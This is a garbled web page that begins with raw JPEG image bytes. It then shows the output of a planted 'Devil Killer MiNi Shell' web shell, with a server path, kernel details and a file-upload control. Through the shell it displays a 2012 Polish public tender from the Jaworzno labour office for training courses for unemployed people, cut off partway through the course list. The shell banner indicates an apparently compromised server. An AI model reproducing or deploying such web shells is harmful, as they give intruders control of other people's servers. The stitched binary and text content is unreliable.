JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120604/186840-N-2012.html

<p class="kh_header"><b>Jaworzno: Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych ze środków Funduszu Pracy</b><br>
<b>Numer ogłoszenia: 186840 - 2012; data zamieszczenia: 04.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Jaworznie , ul. Północna 9B, 43-600 Jaworzno, woj. śląskie, tel. 032 6181924, faks 032 6181901.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupjaworzno.internetdsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych ze środków Funduszu Pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych ze środków Funduszu Pracy w następujących zakresach:
Zakres I: Sprzedawca - 12 osób w I edycji, 
Zakres II: Pracownik  administracyjno - biurowy -6 osób w I edycji,
Zakres III: Księgowość w małych i średnich przedsiębiorstwach z elementami kadr i płac-5 osób w I edycji,
Zakres IV: Pomoc kuchenna z elementami kelnera - 1 osoba,
Zakres  V: Kelner-barman - 1 osoba,
Zakres VI: Kelner-barman  z elementami pomocy kuchennej - 5 osób w I edycji,
Zakres VII: Kelner-barman z elementami pomocy kuchennej - 2 osoby w I edycji,
Zakres VIII: Kucharz małej gastronomii -5 osób  w I edycji,
Zakres IX: Kosmetyczka - 4 osoby w I edycji,
Zakres X: Podstawy przedsiębiorczości - 10 osób w I edycji,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał, że posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę Wykonawcy - zgodnie z rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych /Dz. U. Nr 236 poz. 2365/.
Ocena spełnienia warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia,
o którym mowa w rozdziale 6 ust.3 pkt 3.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał co najmniej trzy usługi, odpowiadające swoim rodzajem przedmiotowi zamówienia.  
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów
i oświadczeń, o których mowa w rozdziale 6 ust.4 pkt 4.1-4.3 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia, Wykonawca wyznaczy do realizacji przedmiotu zamówienia kadrę wykładowczą, spełniającą następujące warunki:
1) wykładowcy prowadzący zajęcia teoretyczne muszą posiadać wykształcenie wyższe związane z kierunkiem szkolenia lub wykształcenie wyższe oraz minimum 5 letnie doświadczenie zawodowe z zakresu objętego szkoleniem;
2) wykładowcy prowadzący zajęcia praktyczne oraz ćwiczenia muszą posiadać co najmniej wykształcenie średnie związane z kierunkiem szkolenia lub wykształcenie średnie oraz minimum 5 letnie doświadczenie zawodowe z zakresu objętego szkoleniem;
3) każda z osób prowadzących zajęcia musi posiadać co najmniej 2 letnie doświadczenie zawodowe w prowadzeniu zajęć zgodnych z kierunkiem szkolenia;
4) każda z osób prowadzących zajęcia musi posiadać uprawnienia pedagogiczne lub co najmniej 
2 letnie doświadczenie zawodowe w prowadzeniu zajęć dydaktycznych.
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w rozdziale 6  ust.5  pkt 5.1-5.2 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy - Prawo zamówień publicznych - (załącznik nr 5 do SIWZ.)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.7</li>
<li>2 - doświadczenie w prowadzeniu szkoleń - 0.2</li>
<li>3 - posiadanie certyfikatu jakości usług - 0.1</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany umowy, po wzajemnym uzgodnieniu stron, w zakresie:
1) osób prowadzących szkolenie. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której nie można było wcześniej przewidzieć) Wykonawca może dokonać wymiany osób delegowanych do wykonania przedmiotu umowy. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując osobę/y o co najmniej porównywalnych kwalifikacjach. Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio
lub pośrednio z wymiany osób, wyznaczonych przez Wykonawcę do wykonania przedmiotu zamówienia.
2) terminu realizacji przemiotu zamówienia. Po uzyskaniu pisemnej zgody Zamawiającego
w szczególnie uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której nie można było wcześniej przewidzieć) Zamawiający może wyrazić zgodę na zmianę terminu realizacji szkolenia. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem.
3) miejsca przeprowadzenia szkolenia. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie uzasadnionych przypadkach, Wykonawca może dokonać zmiany miejsca przeprowadzenia szkolenia.
W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując propozycję miejsca szkolenia o co najmnie porównywalnych warunkach. Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio ze zmiany miejsca szkolenia.
4) zmniejszenia ilości osób przewidzianych do przeszkolenia - w szczególnie uzasadnionych przypadkach tj. rezygnacja osoby zakwalifikowanej na szkolenie w terminie uniemożliwiającym dokonanie kolejnego naboru, Zamawiający może zmniejszyć ilość skierowanych na szkolenie maksymalnie o 1 osobę ( dotyczy szkoleń realizowanych dla grupy minimum 5 osobowej).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupjaworzno.internetdsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Jaworznie, ul. Północna 9b, 43-600 Jaworzno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2012 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie Powiatowego Urzędu Pracy w Jaworznie przy ulicy Północnej 9b,  I  piętro, pokój nr 124,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakres I: Sprzedawca -12 osób w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 4 tygodnie.
Program szkolenia: minimalna ilość godzin -180, w tym minimum 110 godzin ćwiczeń.
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: sprzedawca, z zakresu: pracownik działu sprzedaży 	(kod zawodu: 522107) z następującymi jednostkami modułowymi: 
1) przestrzeganie zasad bezpieczeństwa i higieny pracy w jednostce handlowej - minimum 6 godzin,
2) organizacja handlu w gospodarce rynkowej - minimum 25 godzin,
3) wyposażenie punktu sprzedaży detalicznej - minimum 18 godzin,
4) organizacja zaopatrzenia i przyjmowanie dostaw towarów - minimum  20 godzin,
5) wykonywanie i dokumentowanie podstawowych obliczeń sklepowych - minimum  20 godzin,
6) obsługiwanie klienta, przebieg sprzedaży detalicznej- minimum 12 godziny.
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie                     z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl. 
2. jednostkę modułową: obsługa kasy fiskalnej i terminali płatniczych - minimum  15 godzin,
3. jednostkę modułową: podstawowe zasady higieny- minimum 10 godzin,
4. jednostkę modułową: obsługa programu SUBIEKT dla WINDOWS do prowadzenia gospodarki magazynowej- 	minimum 10 godzin,
5. jednostkę modułową: nowoczesne techniki sprzedaży- minimum  14 godzin,
6. jednostkę modułową: lektorat języka angielskiego (słownictwo związane z tematem szkolenia)- minimum 30 	godzin.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 24.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakres II: Pracownik  administracyjno - biurowy -6 osób w I edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 5 tygodni. 
Program szkolenia:  minimalna ilość godzin- 150, w tym minimum  90 godzin ćwiczeń.
1. Program szkolenia powinien być dostosowany do standardów kwalifikacji zawodowych dla zawodu: pracownik 	administracyjny (kod zawodu: 343101) i pracownik biurowy (kod zawodu:419101) oraz musi zawierać 	następujące jednostki modułowe: 
1) organizowanie pracy własnej zgodnie z zasadami ergonomii, bezpieczeństwa i higieny pracy, 	ochrony  przeciwpożarowej i ochrony środowiska oraz zarządzanie w jednoste organizacyjnej,
2) organizowanie pracy własnej na stanowisku technika administracji, usprawnianie pracy oraz 		 doskonalenie osobistych kompetencji,
3) organizowanie spotkań służbowych, z kontrahentami, pracownikami i klientami oraz innych prac 	 związanych z funkcjonowaniem przedsiębiorstwa,
4)  przyjmowanie i obsługiwanie interesantów,
5)  wykonywanie prac admninistracyjnych związanych z ogólną działalnością jednostki organizacyjnej,
6)  zapewnianie przepływu informacji i dokumentów wewnątrz i na zewnątrz organizacji,
7) sporządzanie dokumentacji prawnej oraz dokumentacji spraw pracowniczych związanej z działalnością 	jednostki organizacyjnej zgodnie z przyjętym systemem kancelaryjnym,
8) przygotowanie i udostępnianie dokumentacji do kontroli,
9) redagowanie korespondencji biurowej w języku polskim,
10) sporządzanie umów, dokumentacji spraw kancelaryjno - biurowych, pracowniczej oraz finansowej 	związanej z działalnością jednostki gospodarczej,
11)  przechowywanie i archiwizowanie informacji, dokumentów oraz akt spraw,
12) gromadzenie i wykorzystywanie informacji ekonomicznych i statystycznych w pracy pracownika 	administracyjnego,
13)  tworzenie i prowadzenie bazy danych kontrahentów,
14)  stosowanie przepisów prawa w pracy zawodowej,
15)  wykonywanie prac biurowych,
16)  współpraca z innymi komórkami organizacyjnymi jednostki,
17)  współpraca z otoczeniem zewnętrznym jednostki organizacyjnej,
18)  kierowanie zespołem pracowników administracyjno-biurowych,
19)  ocenianie jakości i efektywności własnych działań zawodowych,
20) obsługa komputera (edytor tekstów, arkusz kalkulacyjny, bazy danych, program do prezentacji 	multimedialnych, poczta elektroniczna, Internet),
21)  obsługa urządzeń biurowych. 
2. jednostkę modułową: lektorat języka angielskiego (słownictwo związane z tematem szkolenia)- minimum                	30 godzin.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakres III:Księgowość w małych i średnich przedsiębiorstwach z elementami kadr i płac -5 osób w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 5 tygodni. 
Program szkolenia: minimalna ilość godzin - 150, w tym minimum 120 godzin ćwiczeń.
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: księgowy (samodzielny), z zakresu:  księgowy 	bilansista (kod zawodu: 343201) z następującymi jednostkami modułowymi:
1) ogólne zasady rachunkowości,
2) środki gospodarcze i źródła ich pochodzenia,
3) ewidencja operacji gospodarczych,
4) organizacja rachunkowości w jednostkach gospodarczych,
5) ogólne zasadu inwentaryzacji,
6) ewidencja obrotu gotówkowego,
7) ewidencja obrotu bezgotówkowego,
8) ewidencja innych środków pieniężnych.
2. 	modułowy program szkolenia zawodowego dla zawodu: księgowy (samodzielny), z zakresu:  księgowość 	dla MŚP z wykorzystaniem komputera (kod zawodu: 343201) z następującymi jednostkami modułowymi: 
1) organizacja księgowości małych i średnich przedsiębiorstw,
2) ewidencja księgowa w małych i średnich przedsiębiorstwach.
3. 	modułowy program szkolenia zawodowego dla zawodu: księgowy (samodzielny), z zakresu:  księgowy ds. 	płac i rozliczeń ZUS (kod zawodu: 343201) z następującymi jednostkami modułowymi: 
1) wynagrodzenie za pracę,
2) ochrona wynagrodzenia za pracę i obowiązki pracodawców,
3) rozliczenie składek ZUS,
4) zasiłki z ubezpieczenia społecznego,
5) kompletowanie wniosków o emerytury i renty oraz ustalenie kapitału początkowego,
6) posługiwanie się oprogramowaniem do rozliczeń z ZUS Płatnik.
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie                             z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
4. 		jednostkę modułową : obsługa programu SYMFONIA- minimum  20 godzin.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia minimum 2 książki, których tematyka zgodna będzie z zakresami szkolenia (księgowość MŚP; kadry i płace)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakres  IV: Pomoc kuchenna z elementami kelnera - 1 osoba.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 8  tygodni.
Program szkolenia:  minimalna ilość godzin - 200, w tym minimum 150 godzin ćwiczeń, przy czym co najmniej 50% ćwiczeń powinno odbyć się na stanowisku pracy (w jednostce żywienia zbiorowego). 
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: kucharz, z zakresu: wykonywanie zadań w kuchni pod 	nadzorem kucharza (512201) z następującymi jednostkami modułowymi:
1) przygotowanie stanowiska pracy zgodnie z wymogami,
2) czynności porządkowe w kuchni,
3) przechowywanie surowców i przygotowanie do obróbki wstępnej,
4) obróbka wstępna jaj,
5) obróbka wstępna ryb,
6) obróbka wstępna jarzyn,
7) obróbka wstępna drobiu i dzikiego ptactwa,
8) obróbka wstępna mięsa zwierząt rzeźnych i dziczyzny,
